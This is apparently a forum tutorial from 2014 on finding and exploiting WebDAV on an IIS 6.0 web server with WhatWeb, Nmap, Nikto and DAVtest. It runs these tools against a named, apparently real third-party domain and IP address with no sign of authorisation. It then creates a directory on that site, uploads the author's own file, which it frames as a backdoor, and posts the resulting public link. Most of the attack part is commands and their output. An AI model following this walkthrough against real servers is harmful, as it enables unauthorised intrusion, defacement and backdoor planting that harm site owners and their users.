WebDAV Vulnerability :: Detect & Exploit

Contents

1 Introduction
2 Requirement
3 Detect using WhatWeb
4 Detect using Nmap
5 Detect using Nikto
6 Detect & exploit using DAVtest

Introduction

WebDAV is an acronym for “Web-Based Distributed Authoring and Versioning” It consists of a set of extensions for the HTTP protocol and is widely used for applications that require users to collaboratively edit and manage files on remote servers.

WebDAV was first discussed in December 1995 by an ad-hoc group of people who were interested in remote authoring. This group began working on the project and later became known as the WebDAV Working Group, part of the Internet Engineering Task Force (IETF).

WebDAV’s major features include file locking, which prevents simultaneous collaborators from overwriting each other, the use of XML properties for storing metadata and easy “copy and move” namespace manipulation.

In this tutorial I will show you how to detect the WebDAV vulnerability using:
WhatWeb
WhatWeb recognises web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices.
WhatWeb has over 1000 plugins, each to recognise something different. WhatWeb also identifies version numbers, email addresses, account IDs, web framework modules, SQL errors, and more.
Download: https://github.com/urbanadventurer/whatweb
Nikto
Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files/programs, checks for outdated versions of over 1250 servers, and version specific problems on over 270 servers. It also checks for server configuration items such as the presence of multiple index files, HTTP server options, and will attempt to identify installed web servers and software.
Nikto is not designed as a stealthy tool. It will test a web server in the quickest time possible, and is obvious in log files or to an IPS/IDS. However, there is support for LibWhisker’s anti-IDS methods in case you want to give it a try (or test your IDS system).
Download: https://www.cirt.net/nikto/nikto-2.1.5.tar.bz2
Nmap
Nmap (“Network Mapper”) is a free and open source (license) utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and official binary packages are available for Linux, Windows, and Mac OS X. In addition to the classic command-line Nmap executable, the Nmap suite includes an advanced GUI and results viewer (Zenmap), a flexible data transfer, redirection, and debugging tool (Ncat), a utility for comparing scan results (Ndiff), and a packet generation and response analysis tool (Nping).
Download: http://nmap.org/dist/nmap-6.46.tar.bz2
DAVtest
DAVTest enables the pentester to quickly determine if a host is vulnerable and then gain access to that host. DAVTest tries to upload test files of various extension types (e.g., “.php” or “.txt”), checks if those files were uploaded successfully, and then if they can execute on the server. It also allows for uploading of the files as plain text files and then trying to use the MOVE command to rename them to an executable.Assuming you can upload an executable, a test file does you no good–so DAVTest can automatically upload a fully functional shell or back-door. It ships with shells for PHP, ASP, ASPX, CFM, JSP, CGI, and PL, and dropping a file in the right directory will let you upload any back-door you like.
Download: https://code.google.com/p/davtest/downlo…st-1.0.zip

Detect using WhatWeb

What Web is very useful, it allow you to know all the server information. This tool is not made to hack your target, it’s a information gathering tool.

Code:

whatweb doozersden.com

The scan looks good, let me show you all interesting informations we have!
ASP_NET[2.0.50727]
HTTPServer[Microsoft-IIS/6.0]
IP[174.0.49.38
X-Powered-By[ASP.NET]

WebDAV servers are always using Microsoft-IIS systems.

ASP_NET means that ASP Backdoors, ASP Shells and all sorts of ASP pages are possible to upload.

The IP allows to scan ports on the server.

These information sounds good to find a WebDAV vulnerability.

Back to the top

Detect using Nmap

Okay, so now I will launch a Nmap scan and I will be able to know which ports are open.

Code:

nmap doozersden.com
22/tcp open ssh
80/tcp open http
873/tcp open rsync

22 = Secure Shell (SSH)—used for secure logins, file transfers (scp, sftp) and port forwarding

80 = most often used by Hypertext Transfer Protocol

873 = rsync file synchronization protocol

Oh nice! the scan confirms that WebDAV is present on the server but we don’t know if WebDAV is enabled!

Port 80 is open, I will penetrate this port to see if WebDAV is enabled

Quote:nmap -T4 -p80 –script=http-iis-webdav-vuln 174.0.49.38

Nmap command on port 80

Webdav script

Server IP (found with WhatWeb)

Code:

|_http-iis-webdav-vuln: WebDAV is ENABLED. No protected folder found;

WebDAV is enabled!

Back to the top

Detect using Nikto

Code:

nikto -host doozersden.com

Here is the most important part of my result:

Quote:root@kali:~# nikto -host doozersden.com

– Nikto v2.1.5

—————————————————————————

+ Target IP: 174.0.49.38

+ Target Hostname: doozersden.com

+ Target Port: 80

+ Start Time: 2014-08-03 10:11:49 (GMT0)

—————————————————————————

+ Server: Microsoft-IIS/6.0

+ Cookie AspxAutoDetectCookieSupport created without the httponly flag

+ Retrieved x-powered-by header: ASP.NET

+ Retrieved x-aspnet-version header: 2.0.50727

+ The anti-clickjacking X-Frame-Options header is not present.

+ Root page / redirects to: /Default.aspx?AspxAutoDetectCookieSupport=1

nikto -ssl – STATUS: Completed 150 tests (~2% complete, 21.3 minutes left: currently in plugin ‘Content Search’)

+ Server leaks inodes via ETags, header found with file /index.php?, fields: 0x5046eb9c5daecf1:50f7

+ No CGI Directories found (use ‘-C all’ to force check all possible dirs)

+ OSVDB-630: IIS may reveal its internal or real IP in the Location header via a request to the /images directory. The value is “http://192.168.1.112/images/”.

+ Multiple index files found: index.php, default.htm, index.html

+ OSVDB-397: HTTP method ‘PUT’ allows clients to save files on the web server.

+ OSVDB-5646: HTTP method ‘DELETE’ allows clients to delete files on the web server.

+ Retrieved dasl header: <DAV:sql>

+ Retrieved dav header: 1, 2

+ Retrieved ms-author-via header: DAV

+ Uncommon header ‘ms-author-via’ found, with contents: DAV

+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH

+ OSVDB-5646: HTTP method (‘Allow’ Header): ‘DELETE’ may allow clients to remove files on the web server.

+ OSVDB-397: HTTP method (‘Allow’ Header): ‘PUT’ method could allow clients to save files on the web server.

+ OSVDB-5647: HTTP method (‘Allow’ Header): ‘MOVE’ may allow clients to change file locations on the web server.

+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH

+ OSVDB-5646: HTTP method (‘Public’ Header): ‘DELETE’ may allow clients to remove files on the web server.

+ OSVDB-397: HTTP method (‘Public’ Header): ‘PUT’ method could allow clients to save files on the web server.

+ OSVDB-5647: HTTP method (‘Public’ Header): ‘MOVE’ may allow clients to change file locations on the web server.

+ WebDAV enabled (SEARCH UNLOCK LOCK MKCOL COPY PROPPATCH PROPFIND listed as allowed)

+ OSVDB-13431: PROPFIND HTTP verb may show the server’s internal IP address: http://192.168.1.112/

Why this result is important ? because we can see that WebDAV is enabled!

Code:

+ WebDAV enabled (SEARCH UNLOCK LOCK MKCOL COPY PROPPATCH PROPFIND listed as allowed)
+ Server: Microsoft-IIS/6.0
UNLOCK — used to remove a lock from a resource
LOCK — used to put a lock on a resource. WebDAV supports both shared and exclusive locks.
MKCOL — used to create collections (a.k.a. a directory)
COPY — used to copy a resource from one URI to another
PROPPATCH — used to change and delete multiple properties on a resource in a single atomic act
PROPFIND — used to retrieve properties, stored as XML, from a web resource. It is also overloaded to allow one to retrieve the collection structure (a.k.a. directory hierarchy) of a remote system.

I showed to you my methods to detect the webdav vulnerability, so now we don’t need to scan the server again, it’s time to exploit the flaw!

Back to the top

Detect & exploit using DAVtest

Code:

davtest -url http://doozersden.com/

The DAV connection is succeeded!

Quote:ASP FAIL

CGI FAIL

ASPX FAIL

CFM SUCCEED

JSP SUCCEED

PL FAIL

TXT SUCCEED

JHTML SUCCEED

PHP SUCCEED

HTML SUCCEED

HTML SUCCEED

SHTML FAIL

This result informs you of formats supported by WebDAV.

I can create a new directory to store my backdoor.

Code:

davtest -url http://doozersden.com/ -directory daisukedan

Directory successfully created, i will now upload my file

Code:

davtest -url http://doozersden.com/daisukedan -uploadfile ‘/root/Desktop/daisuke.html’ -uploadloc daisuke.html

All is done!

Link: http://doozersden.com/daisukedan/daisuke.html

I hope you have liked!